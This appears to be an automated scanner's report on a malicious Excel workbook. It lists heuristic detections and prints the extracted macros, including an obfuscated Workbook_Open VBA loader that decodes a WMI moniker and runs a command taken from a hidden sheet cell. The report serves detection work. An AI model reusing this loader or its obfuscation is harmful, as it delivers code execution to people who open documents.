MALICIOUS
350
Risk Score
Heuristics 10
-
Office EPRINT stream contains EMF object high OLE_EPRINT_EMF_OBJECTOLE ObjectPool contains an EPRINT stream with EMF data. This is rare in normal documents and is related Office object-delivery evidence when paired with exploit payload anomalies, but the malformed graphics record required for exact CVE attribution is not proven by this rule alone.
-
ClamAV: Xls.Malware.Valyria-9756472-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Xls.Malware.Valyria-9756472-0
-
URL reconstructed from XLM cell array (3 URLs) critical OLE_XLM_CELL_ARRAY_URLExcel 4.0 macro sheet stages its payload URL across the BIFF8 Shared String Table (one quoted-char SST entry concatenated with & at runtime), across individual numeric cells (one ASCII charcode per cell), or split across multi-char fragment cells a download formula concatenates by reference (=A1&A2&… / CONCATENATE(...)). The reconstructed URL is invisible to literal-bytes URL extraction because it is never contiguous in the workbook stream. URLs were recovered by walking the BIFF8 record stream and decoding SST entries, LABELSST/RK/NUMBER cells, and FORMULA cell-reference concatenation in token order.
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADERAuto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.Matched line in script
Set ÍèñóÅãØ½¸¼É³Õ¾Ùµ®áÍÆÂ´£õÒȨ́×Ùĺó²ŠìíÍë¢ = GetObject(×ÛÃê½µ¹û«Ø¿îÊØßå´¾Û«ö®çòåᣬªä̦£ÅÔsû²) -
GetObject call high OLE_VBA_GETOBJGetObject callMatched line in script
Set ÍèñóÅãØ½¸¼É³Õ¾Ùµ®áÍÆÂ´£õÒȨ́×Ùĺó²ŠìíÍë¢ = GetObject(×ÛÃê½µ¹û«Ø¿îÊØßå´¾Û«ö®çòåᣬªä̦£ÅÔsû²) -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Workbook_Open macro low OLE_VBA_WBOPENWorkbook_Open macroMatched line in script
Sub Workbook_Open() -
Excel 4.0 (XLM) macro sheet present medium OLE_XLM_AUTOOPENWorkbook contains an Excel 4.0 macro sheet sub-stream — XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://www.cmu.edu/blackboard Referenced by macro
- http://www.cmu.edu/blackboard/files/evaluate/tests-example.xlsReferenced by macro
- http://www.cmu.edu/blackboard/evaluate#manage_tests/import_questionsReferenced by macro
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
xlm_macros.txt |
xlm-macro | oletools.olevba.extract_all_macros (XLM macro listing) | 2959 bytes |
SHA-256: 94bdf34eb53bc8fa1f8786d17c0534cb5f72d1d233dcd2f187e136b4ee8ac6d8 |
|||
Preview scriptFirst 1,000 lines of the extracted script
' 0085 20 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible - Format Abbr ' 0085 14 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible - Readm ' 0085 13 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible - AYIU ' 002a 2 PRINTHEADERS : Print Row/Column Labels ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 002a 2 PRINTHEADERS : Print Row/Column Labels ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 002a 2 PRINTHEADERS : Print Row/Column Labels ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' Sheet,Reference,Formula,Value |
|||
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 6415 bytes |
SHA-256: bffb140cc08f871ae91d33c766becfd8dd8c3c556da38dabd03a0d65587e4844 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Option Explicit
Private ©¿¯·©Œ´‡öĬíï¾ÀºS¿íŒ¤÷ÂÚô±ÌÏÀϱÁ‡µÍ¾ As String
Private ×ÛÃê½µ¹û«Ø¿îÊØßå´¾Û«ö®çòåᣬªä̦£ÅÔsû² As String
Private 寲Ÿ¬ÖѾ¬ÙèÑô¿ÖúåÂöÀãè»ñµ¿Ÿº¼ÛSªü忊÷ßÖ As String
Private å¼Ò÷ɇ¾ÖÉÉìÀ¤áïÊê»Ä⾵Σõ¯ß¯¤Òs As String
Private ó綠àÔ¼Äâ¤çܸÁ¯Ôëµ§¨÷ﯬÙÅ䳌¹î¢½´ÉÇ»¼ As String
Private ÍèñóÅãØ½¸¼É³Õ¾Ùµ®áÍÆÂ´£õÒȨ́×Ùĺó²ŠìíÍë¢ As Object
Private ÍóË»»î´å²ºûµ¿×Ò¯Ñ×놩ƿ¼ß»Ü¸½°¾½èƒ«½ As Object
Private Const ò¸µú½¾®÷±ÉœêsßÕÛ´¾Œ·Y辊öµ»ê¢Ä¬âÖ = Null
Sub Workbook_Open()
Áê¾ó°á¤ÄÌæ¦¾£åéÒ×±×µÓŸË£â±ÌÕߨ좚¼÷
ÍèñóÅãØ½¸¼É³Õ¾Ùµ®áÍÆÂ´£õÒȨ́×Ùĺó²ŠìíÍë¢.Create å¼Ò÷ɇ¾ÖÉÉìÀ¤áïÊê»Ä⾵Σõ¯ß¯¤Òs, ò¸µú½¾®÷±ÉœêsßÕÛ´¾Œ·Y辊öµ»ê¢Ä¬âÖ, ÍóË»»î´å²ºûµ¿×Ò¯Ñ×놩ƿ¼ß»Ü¸½°¾½èƒ«½, Null
End Sub
Private Sub Áê¾ó°á¤ÄÌæ¦¾£åéÒ×±×µÓŸË£â±ÌÕߨ좚¼÷()
©¿¯·©Œ´‡öĬíï¾ÀºS¿íŒ¤÷ÂÚô±ÌÏÀϱÁ‡µÍ¾ = ""
Dim ±±¢¿Í‡ÉÓº»áåö»ô£û±°º¿ã¾¯Èä½ÍªàÏã As Long
Dim ±±¢¿Í‡ÉÓº»áåö»ô£û±°º¿ã¾¯Èä½ÍªàÏã2 As String: ±±¢¿Í‡ÉÓº»áåö»ô£û±°º¿ã¾¯Èä½ÍªàÏã2 = Chr(Int(0 + Int(13 / 2) + Int(11 / 4) + 7 + 3 + 3 + 5 + 4 + 8)) & Chr(Int(0 + Int(12 / 1) + Int(14 / 1) - 14 - 6 + 9 + 8 + 3 + 46))
For ±±¢¿Í‡ÉÓº»áåö»ô£û±°º¿ã¾¯Èä½ÍªàÏã = 1 To Len("CABCC1C0BAC0C7C68DAFAF81AFC5C2C2C7AFB6BCC0C9858DAABCC18685B2A3C5C2B6B8C6C6") Step 2
©¿¯·©Œ´‡öĬíï¾ÀºS¿íŒ¤÷ÂÚô±ÌÏÀϱÁ‡µÍ¾ = ©¿¯·©Œ´‡öĬíï¾ÀºS¿íŒ¤÷ÂÚô±ÌÏÀϱÁ‡µÍ¾ & Chr(CLng(±±¢¿Í‡ÉÓº»áåö»ô£û±°º¿ã¾¯Èä½ÍªàÏã2 & Mid("CABCC1C0BAC0C7C68DAFAF81AFC5C2C2C7AFB6BCC0C9858DAABCC18685B2A3C5C2B6B8C6C6", ±±¢¿Í‡ÉÓº»áåö»ô£û±°º¿ã¾¯Èä½ÍªàÏã, 2)) - 83)
Next ±±¢¿Í‡ÉÓº»áåö»ô£û±°º¿ã¾¯Èä½ÍªàÏã
×ÛÃê½µ¹û«Ø¿îÊØßå´¾Û«ö®çòåᣬªä̦£ÅÔsû² = ©¿¯·©Œ´‡öĬíï¾ÀºS¿íŒ¤÷ÂÚô±ÌÏÀϱÁ‡µÍ¾
Set ÍèñóÅãØ½¸¼É³Õ¾Ùµ®áÍÆÂ´£õÒȨ́×Ùĺó²ŠìíÍë¢ = GetObject(×ÛÃê½µ¹û«Ø¿îÊØßå´¾Û«ö®çòåᣬªä̦£ÅÔsû²)
©¿¯·©Œ´‡öĬíï¾ÀºS¿íŒ¤÷ÂÚô±ÌÏÀϱÁ‡µÍ¾ = ""
For ±±¢¿Í‡ÉÓº»áåö»ô£û±°º¿ã¾¯Èä½ÍªàÏã = 1 To Len("CABCC1C0BAC0C7C68DAFAF81AFC5C2C2C7AFB6BCC0C985") Step 2
©¿¯·©Œ´‡öĬíï¾ÀºS¿íŒ¤÷ÂÚô±ÌÏÀϱÁ‡µÍ¾ = ©¿¯·©Œ´‡öĬíï¾ÀºS¿íŒ¤÷ÂÚô±ÌÏÀϱÁ‡µÍ¾ & Chr(CLng(±±¢¿Í‡ÉÓº»áåö»ô£û±°º¿ã¾¯Èä½ÍªàÏã2 & Mid("CABCC1C0BAC0C7C68DAFAF81AFC5C2C2C7AFB6BCC0C985", ±±¢¿Í‡ÉÓº»áåö»ô£û±°º¿ã¾¯Èä½ÍªàÏã, 2)) - 83)
Next ±±¢¿Í‡ÉÓº»áåö»ô£û±°º¿ã¾¯Èä½ÍªàÏã
寲Ÿ¬ÖѾ¬ÙèÑô¿ÖúåÂöÀãè»ñµ¿Ÿº¼ÛSªü忊÷ßÖ = ©¿¯·©Œ´‡öĬíï¾ÀºS¿íŒ¤÷ÂÚô±ÌÏÀϱÁ‡µÍ¾
©¿¯·©Œ´‡öĬíï¾ÀºS¿íŒ¤÷ÂÚô±ÌÏÀϱÁ‡µÍ¾ = ""
For ±±¢¿Í‡ÉÓº»áåö»ô£û±°º¿ã¾¯Èä½ÍªàÏã = 1 To Len(Sheets("AYIUJ").Cells(134, 8).Value) Step 2
©¿¯·©Œ´‡öĬíï¾ÀºS¿íŒ¤÷ÂÚô±ÌÏÀϱÁ‡µÍ¾ = ©¿¯·©Œ´‡öĬíï¾ÀºS¿íŒ¤÷ÂÚô±ÌÏÀϱÁ‡µÍ¾ & Chr(CLng(±±¢¿Í‡ÉÓº»áåö»ô£û±°º¿ã¾¯Èä½ÍªàÏã2 & Mid(Sheets("AYIUJ").Cells(134, 8).Value, ±±¢¿Í‡ÉÓº»áåö»ô£û±°º¿ã¾¯Èä½ÍªàÏã, 2)) - 83)
Next ±±¢¿Í‡ÉÓº»áåö»ô£û±°º¿ã¾¯Èä½ÍªàÏã
å¼Ò÷ɇ¾ÖÉÉìÀ¤áïÊê»Ä⾵Σõ¯ß¯¤Òs = ©¿¯·©Œ´‡öĬíï¾ÀºS¿íŒ¤÷ÂÚô±ÌÏÀϱÁ‡µÍ¾
©¿¯·©Œ´‡öĬíï¾ÀºS¿íŒ¤÷ÂÚô±ÌÏÀϱÁ‡µÍ¾ = ""
For ±±¢¿Í‡ÉÓº»áåö»ô£û±°º¿ã¾¯Èä½ÍªàÏã = 1 To Len("AABCC18685B2A3C5C2B6B8C6C6A6C7B4C5C7C8C3") Step 2
©¿¯·©Œ´‡öĬíï¾ÀºS¿íŒ¤÷ÂÚô±ÌÏÀϱÁ‡µÍ¾ = ©¿¯·©Œ´‡öĬíï¾ÀºS¿íŒ¤÷ÂÚô±ÌÏÀϱÁ‡µÍ¾ & Chr(CLng(±±¢¿Í‡ÉÓº»áåö»ô£û±°º¿ã¾¯Èä½ÍªàÏã2 & Mid("AABCC18685B2A3C5C2B6B8C6C6A6C7B4C5C7C8C3", ±±¢¿Í‡ÉÓº»áåö»ô£û±°º¿ã¾¯Èä½ÍªàÏã, 2)) - 83)
Next ±±¢¿Í‡ÉÓº»áåö»ô£û±°º¿ã¾¯Èä½ÍªàÏã
ó綠àÔ¼Äâ¤çܸÁ¯Ôëµ§¨÷ﯬÙÅ䳌¹î¢½´ÉÇ»¼ = ©¿¯·©Œ´‡öĬíï¾ÀºS¿íŒ¤÷ÂÚô±ÌÏÀϱÁ‡µÍ¾
©¿¯·©Œ´‡öĬíï¾ÀºS¿íŒ¤÷ÂÚô±ÌÏÀϱÁ‡µÍ¾ = ""
Set ÍóË»»î´å²ºûµ¿×Ò¯Ñ×놩ƿ¼ß»Ü¸½°¾½èƒ«½ = GetObject(寲Ÿ¬ÖѾ¬ÙèÑô¿ÖúåÂöÀãè»ñµ¿Ÿº¼ÛSªü忊÷ßÖ).Get(ó綠àÔ¼Äâ¤çܸÁ¯Ôëµ§¨÷ﯬÙÅ䳌¹î¢½´ÉÇ»¼).SpawnInstance_
©¿¯·©Œ´‡öĬíï¾ÀºS¿íŒ¤÷ÂÚô±ÌÏÀϱÁ‡µÍ¾ = ""
End Sub
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.